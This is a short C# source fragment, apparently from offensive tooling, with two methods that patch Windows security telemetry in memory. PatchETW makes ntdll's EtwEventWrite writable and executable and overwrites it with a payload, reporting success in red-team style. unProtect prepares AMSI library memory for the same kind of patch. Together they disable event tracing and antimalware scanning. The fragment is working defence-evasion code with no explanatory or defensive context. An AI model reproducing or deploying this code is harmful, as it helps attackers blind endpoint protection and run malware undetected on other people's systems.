private static void PatchETW()
{
IntPtr pEtwEventSend = GetLibraryAddress("ntdll.dll", "EtwEventWrite");
IntPtr pVirtualProtect = GetLibraryAddress("kernel32.dll", "VirtualProtect");
VirtualProtect fVirtualProtect = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(pVirtualProtect, typeof(VirtualProtect));
var patch = getETWPayload();
uint oldProtect;
if (fVirtualProtect(pEtwEventSend, (UIntPtr)patch.Length, 0x40, out oldProtect))
{
Marshal.Copy(patch, 0, pEtwEventSend, patch.Length);
Console.WriteLine("[+] Successfully unhooked ETW!");
}
}
private static IntPtr unProtect(IntPtr amsiLibPtr)
{
IntPtr pVirtualProtect = GetLibraryAddress("kernel32.dll", "VirtualProtect");
VirtualProtect fVirtualProtect = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(pVirtualProtect, typeof(VirtualProtect));
uint newMemSpaceProtection = 0;
if (fVirtualProtect(amsiLibPtr, (UIntPtr)getAMSIPayload().Length, 0x40, out newMemSpaceProtection))
{
return(amsiLibPtr);
}
else
{
return((IntPtr)0);
}
}
